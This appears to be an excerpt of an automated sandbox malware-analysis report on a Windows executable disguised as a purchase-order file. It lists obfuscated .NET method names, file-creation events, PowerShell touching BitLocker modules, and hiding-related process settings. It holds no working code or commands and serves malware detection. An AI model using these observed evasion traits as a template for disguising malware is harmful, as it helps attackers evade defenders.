                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, RKP540HM4yXe9jqp6d.csHigh entropy of concatenated method names: 'z7o4iZZWtN', 'pLH4BbHaK4', 'XfJ4DnDVJ2', 'L6Q4H0q5lB', 'ukK4lRV0iv', 'wW04P7w8C7', 'UGs4QwR9Ib', 'toC4yUMr5q', 'iho4n5aYBk', 'H2n4kjoj6w'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, U6kGI599D4WgGtrxspt.csHigh entropy of concatenated method names: 'NKmkqBaOBt', 'RobkzSowuR', 'kFlj6GJ984', 'mjDj9PIiMG', 'qs4jmW9EbT', 'gSqjRVxB30', 'TSajvBq8B9', 'o3WjKxF6k5', 'vaVj3s9JpO', 'TJ0j7n7eRY'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, oAxwWc4y0XBtNYpeMP.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'EaamghgLeQ', 'KsqmqRmXTZ', 'TPTmzhI5Oe', 'g7wR6ytKju', 'hErR9mTNki', 'P4yRmO1MpN', 'VbYRRfQKtB', 'kGirUdQWWAXISnhvm97'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, ky7MnMMS7iO41l4PF8.csHigh entropy of concatenated method names: 's2J03CReV8', 'mn9047ZsZ6', 'xnS0YEyhim', 'jTjYqOBJXW', 'B7OYziIlSl', 'HjU06KNVfb', 'vy809U44bQ', 'WoY0mnkcFC', 'IuD0RgjjCO', 'xjb0vE8oVm'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, NKmx3ySgEINLawaDA1.csHigh entropy of concatenated method names: 'I820OmWgL8', 'Brc0wna5XL', 'mkr0FE97Bg', 'UQl0i5TV0q', 'IR50I2UXhg', 'JuH0BxDyIC', 'h4q0CuPSAp', 'Y3Q0DWJP25', 'b8W0HnA7qL', 'p7T0JTotiV'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, GFItnUzkbCgQH6Refe.csHigh entropy of concatenated method names: 'bLMkBfxxxw', 'jF2kDDOo3X', 'ia5kHwEHh3', 'giSkrlFlkH', 'GW8kNuxINx', 'M6qkXQWxRS', 'LQakoNPJ8m', 'HHIkf8ADS3', 'BfBkOc2E9Q', 'Kxnkwx7jtl'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, yUtNMNgj1qq0s8mVWU.csHigh entropy of concatenated method names: 'q0mnr1UV5F', 'GnNnN6o7Of', 'icen19uTls', 'PGTnXyOWGJ', 'LYMnobkZ8q', 'fSMnpk3kXW', 'MdlnMJ1vwB', 'oEgndeneUQ', 'wRinSSPe4b', 'iu5nsja1Fh'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, TbqoPMmuwNbw5jUc2Q.csHigh entropy of concatenated method names: 'ebHFQoGrn', 'xgxiLI8H8', 'ngyBNeaDM', 'MKbC94bHC', 'HfXHZnIRo', 'wD0J3WoGF', 'nVNF9ArPgAiJC23jsN', 'nStYuO5gAWZlRIucRF', 'PYFJae61ZnGqmMTQCH', 'HdHyq5JsR'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, V5JjKuabZqAWXDtp5s.csHigh entropy of concatenated method names: 'mGpQhS0VO6', 'kASQqMw54D', 'aHhy6v0Rku', 'sIdy9eHd9Y', 'l7bQGvKMEs', 'bLfQZVUcIR', 'Gk7Q2DudPU', 'tGEQEFDlU3', 'NtrQVWnNjc', 'CK3QLRBqWN'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, Oeqh8dDwUiwosl8xFO.csHigh entropy of concatenated method names: 'BM57EHrEG0', 'Ls97VXKQI0', 'You7LIHgEi', 'qxI7WcqrPN', 'ReF78pg3Ju', 'VHg7av83BI', 'j0m7xVAMxT', 'kli7h1lkLE', 'LCA7gpdoOO', 'OAX7qPRL4k'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, C0rKsorgR2vF5UGEWL.csHigh entropy of concatenated method names: 'sJSYK1ye4c', 'eIxY726IPV', 'VW7YAjoKX0', 'kG0Y0o0HGc', 'RcoY5yna1V', 'U9tA8S0nCv', 'zNVAaYqjRW', 'PEpAxE8Ed5', 'aVqAhPabj3', 'GDlAgnhX7S'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, A6vJ9L9mUklshRUCAIC.csHigh entropy of concatenated method names: 'ToString', 'DNnjDxCI1e', 'zcGjHGmjBp', 'TSdjJIPpU1', 'r8fjrTJbtH', 'd30jNg4O8L', 'RZjj11JQC4', 'Y7fjXGWssO', 'fGlTUA7zCjxhUBQApTu', 'hO1bWayVZRZDPalCIvE'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, ealEPex077Y4TTePms.csHigh entropy of concatenated method names: 'BOwnlE48tU', 'hJsnQYkcVp', 'KRHnnEhfaT', 'OyLnjtupx0', 'GUxnekTcf5', 'VWsnfT9Ab0', 'Dispose', 'NJJy3N4ZgE', 'Mi3y7S4SEl', 'JwOy44dsLf'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, hHXEaRqvWA7edigZUi.csHigh entropy of concatenated method names: 'f39k4GgpGc', 'ftHkAoLmM1', 'YrnkYEriRl', 'QNGk0NmZ6t', 'kULknPHSi7', 'Fs8k5p5RiW', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, Jp5oXy9vrfHSaFguhmG.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UdJTntbpWc', 'vThTkR5irO', 'LblTjyRgBg', 'zOYTTaSDee', 'DaQTeSDPEa', 'd3uTtU1s7m', 'jFnTfA8lhD'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, UgQwYbW8dTiCUFoYYM.csHigh entropy of concatenated method names: 'lhiQc8oKXn', 'hrkQbGk5t4', 'ToString', 'zjlQ3Uvp5U', 'FPsQ7OO1BL', 'kkPQ4P07bV', 'PBMQANtgjD', 'pxsQY7JoqA', 'BYpQ0T5Wx5', 'SsHQ5Sxu2w'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, cYMcXZ7Au5o5ToCO08.csHigh entropy of concatenated method names: 'Dispose', 'gY49gTTePm', 'kd9mNJ5H2A', 'jU553Cp1N8', 'NB19qnvjTc', 'Vcj9zcm2Il', 'ProcessDialogKey', 'pAwm6UtNMN', 't1qm9q0s8m', 'RWUmm4HXEa'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, iVWwabv4xXnbA1dtSj.csHigh entropy of concatenated method names: 'q1G90eqh8d', 'yUi95wosl8', 'jM49cyXe9j', 'Yp69bdOGwS', 'PeA9l8qB0r', 'eso9PgR2vF', 'zARHyUQQ8jNu1NdIrO1', 'TOMwy1QERoXcHhJFMiH', 'VPZ99jocUq', 'HnF9RDJLKv'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, zSofow2BFxtS1KqH59.csHigh entropy of concatenated method names: 'CJSuDkR68d', 'urwuHK3qkA', 'aVjur6uHAR', 'yX1uNEdnRm', 'S2YuXJ0ouo', 'wypuo1SupG', 'gWfuMet7lP', 'JequdVXtda', 'j3gusp38SN', 'BknuGpeGG2'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, ePqRFg96smRT171bqGl.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kLUkGKR8CT', 'xqekZFLBrb', 'imjk2ZNLAs', 'j0ekE6y2Bg', 'CDekVV4Ndt', 'FkwkLCANsu', 'cRukWW9L6i'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, jQI0QRLWF0SUBPkkkX.csHigh entropy of concatenated method names: 'ToString', 'YOKPGsSXls', 'WRfPNqYLxN', 'rDQP1nq1TE', 'dJZPXh0lc5', 'rCrPoygs4j', 'HUbPpKJ0Jw', 'yMFPMU1s0C', 'I6cPdRMJwH', 'hfyPSgk8oI'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, xGwSjWJQNIkl5ZeA8q.csHigh entropy of concatenated method names: 'MrQAIqTiYj', 'aLMACE7nvo', 'WFu41cGgoW', 'LK54XWyBXq', 'KuZ4oK7wUs', 'qOR4ppVd5f', 'zmb4MZBTRp', 'RAW4dQgapH', 'kJq4SysRPK', 'KX54s51uwY'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, C5gGFg5FauOGa29wLc.csHigh entropy of concatenated method names: 'YEERKDdM2b', 'USTR3merTT', 'eRDR7REWFP', 'MAXR4QZ4os', 'bXjRA6qnmJ', 'vonRYwMM7A', 'MKfR0JWnki', 'BDFR5TYfbY', 'MYCRUJmlsb', 'DYqRcvcHZs'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, bHxwUyN3Tdr8G4PiTq.csHigh entropy of concatenated method names: 'thXCvlETiuhZADjwAkV', 'VCKqUUESuspU7xPTHeR', 'HKuPquE3OdDnWmLbHKx', 'G0wYyRDFkW', 'CgVYnuGvER', 'mBcYkAshXu', 'NJTKZgEXF8MRN0FdwyC', 'Vuk9afElVJfU2tshWGp'
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeFile created: \po-1124-0018- ttr-asp1 .. 20 adet 0191621.exe
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeFile created: \po-1124-0018- ttr-asp1 .. 20 adet 0191621.exe
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeFile created: \po-1124-0018- ttr-asp1 .. 20 adet 0191621.exeJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeFile created: \po-1124-0018- ttr-asp1 .. 20 adet 0191621.exeJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
